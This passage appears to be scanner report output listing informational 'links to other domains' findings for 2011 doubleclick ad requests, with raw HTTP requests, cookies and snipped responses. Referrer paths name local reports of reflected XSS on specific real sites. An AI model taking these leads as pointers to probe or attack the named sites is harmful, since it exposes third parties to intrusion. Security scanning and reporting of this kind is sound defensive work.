</script><iframe width="160" height="600" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html?rtbhost=rts-rr12.sldc.dataxu.net&btid=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkF8R0ZUaHhEMEVMQnwxMzAzNjU4NTQzNjM0fDF8MEY5OXBpbjNianwwUkRNZDJQcDU2fEVYXzEwMjM0NzcyMDZ8MzgxNTk5&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRALQAI-hAK5XtJGKsHuhilbCHDocZSZdL3wA&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEY5OXBpbjNiag&ciu=MFJETWQyUHA1Ng&reqid=NERCNDQwMkQwMDA4RkExMDBBRTU3QjQ5MThBQjA3QkE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=381&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&"> </iframe>
...[SNIP]...

23.301. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679824&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661824155&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661824160&frm=1&adk=2614322350&ga_vid=676943326.1303661824&ga_sid=1303661824&ga_hid=1618482813&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=44901217&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:17:01 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14566

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3DDealfind.com/Chicago%26adT%3DChicago%2B1-Day%2BCoupons%26adU%3Dwww.Booksurge.com%26adT%3DAmazon%2Bself%2Bpublishing%26gl%3DUS&amp;usg=AFQjCNGUNULLXYSA_3e87VGy9x5rRPOvfw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.302. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303680269&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Freflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-lifelockcom.html.bak&dt=1303662269350&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662269361&frm=0&adk=1607234649&ga_vid=1362828604.1303662269&ga_sid=1303662269&ga_hid=1474782615&ga_fc=0&u_tz=-300&u_his=12&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&fu=0&ifi=1&dtd=21&xpc=x44lK4PEaz&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:24:45 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13327

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19> <span class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-lifelockcom.html.bak%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.GoKeyless.com%26adT%3DKeyless%2BLocks%2BOutlet%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BNetwork%2BSecurity%26adU%3Dwww.global-locksmith.com%26adT%3D%252415%2BLocal%2BLocksmiths%2B24/7%26gl%3DUS&amp;usg=AFQjCNED_QyvuoMXa0W6Lda-1M04O2PhhQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.303. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303680269&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Freflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-lifelockcom.html.bak&dt=1303662269350&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662269361&frm=0&adk=1607234649&ga_vid=1362828604.1303662269&ga_sid=1303662269&ga_hid=1474782615&ga_fc=0&u_tz=-300&u_his=12&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&fu=0&ifi=1&dtd=21&xpc=x44lK4PEaz&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:24:26 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12601

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19> <span class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/24/dork/reflected-xss-cross-site-scripting-ghdb-cwe-79-capec-86-lifelockcom.html.bak%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.GoKeyless.com%26adT%3DKeyless%2BLocks%2Bfrom%2B%252489%26adU%3Dwww.global-locksmith.com%26adT%3D%252415%2BLocal%2BLocksmiths%2B24/7%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26gl%3DUS&amp;usg=AFQjCNEd3qqrFi4jiS4H7jcf8uoCblhtIA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.304. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303683595&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Fxss-hidden-field-clientid-style-attribute.sealcontrolcasecom.htm&dt=1303665595972&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303665595988&frm=0&adk=1819763764&ga_vid=613187468.1303665596&ga_sid=1303665596&ga_hid=1982879303&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&eid=33895130&fu=0&ifi=1&dtd=35&xpc=j3B48SWpJ8&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 17:19:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12706

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/24/dork/xss-hidden-field-clientid-style-attribute.sealcontrolcasecom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Dell.com/Blades%26adT%3DManage%2BBlade%2BServer%26adU%3Dwww.ServerTech.com%26adT%3DData%2BCenter%2BPower%2BMgmt%26adU%3Dwww.quietpcusa.com%26adT%3DXRackPro2%2B25U%2BRackmount%26gl%3DUS&amp;usg=AFQjCNEjTBBSHyWRFZIX_otHD3lmjhY3rg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.305. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679482&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661482921&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661482926&frm=1&adk=2614322350&ga_vid=587495247.1303661483&ga_sid=1303661483&ga_hid=1423173856&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:11:20 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14538

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3DAmazonRiverCruises.com%26adT%3DAmazon%2BRiver%2BCruises%26adU%3Dwww.Booksurge.com%26adT%3DAmazon%2Bself%2Bpublishing%26gl%3DUS&amp;usg=AFQjCNFsj86ZEFb-EpWclw9aLntwn4_D6w" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.306. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679581&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661581392&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661581397&frm=1&adk=2614322350&ga_vid=918498602.1303661581&ga_sid=1303661581&ga_hid=284338913&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:12:58 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25474489&ahcid=640462&bimpd=D1wGbT704vP8WlJTzQ2cV2MLf0crBPVD2Y7dg7y_To5KfJFpWkYyPrBRLwgjCy6YuFTWCPddvgIofnAgOUOLyq9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BH3iX1ZfkEPugt72CmK04CyGDOWIWwtpfKu6Yb9nPGUMhtlfbsVT-wOwKJBNR3jwWTazV0AvbMQZNLntaOeKl1p3e0zVN6loNyK4c_OoCgom8jpD4tX7Nxwn2-BtKmkq7LmKEOeK4ZAoWfwI8SCWgb1j-Ezh3q9PALHUe6oayQIztC8cnfVoc-ffY0bjr9ypPr7vVxLo4SQGNqr6znxbeBigsLTxdpnye91zCQ7JsBxbrg3DoDCmL2ffRtSVuJNqJgaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeuZcgF_uJfsdRlJrg2l5qBJ5nm0lTjSklndxOrj4-IjIX91mNtx9s8FQapZIbkQ1tNBrIEGL6Qi9P13I5nx5nfrUTIn0Td2nwm_BxyX48CybH3NngsQiO9YMiN-l9OgnK6Lhd38O4b4WbBWengTve4vt_T370WDWWY1SqEwEJwbhoHTLamDrAmQq2DYIVNCf6VQGYjf1QW3f3F61FH8ZW8ZA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRMCgAG27YK5XbJLDQXVk97sR0DVdN5sQtjdA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBHhYPCky0Tba3G8ntlQfWrtDhAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbClYHu9567sukB%26num%3D1%26sig%3DAGiWqtwpBMlqXzWHH4VX4kgZ93lH-yM4vQ%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.307. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679790&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661790100&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303661790105&frm=1&adk=2614322350&ga_vid=1772951269.1303661790&ga_sid=1303661790&ga_hid=395311576&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:16:27 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14526

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.AmazonServices.com/ProductAds%26adT%3DAmazon%2BProduct%2BAds%26adU%3DDealfind.com/Chicago%26adT%3DChicago%2B1-Day%2BCoupons%26adU%3DECKOHousePublishing.com%26adT%3DSell%2BYour%2BBook%2Bon%2BAmazon%26gl%3DUS&amp;usg=AFQjCNG7TpFuPZlB3nasjTzpfRxx97G2Xw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.308. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303689716&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Freflected-xss-ghdb-cwe-79-capec-86-swisscomonlineshop.sso.bluewin.ch_80.htm&dt=1303671716392&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303671716568&frm=0&adk=1819763764&ga_vid=1985060606.1303671717&ga_sid=1303671717&ga_hid=900169850&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=907&fu=0&ifi=1&dtd=256&xpc=9ztss7Abin&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 19:01:44 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 11288

<style>body{margin:0;padding:0}</style><div id="google_flash_inline_div" style="position:relative;z-index:1001;width:728px"><div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/TemplateContainer.swf">
...[SNIP]...
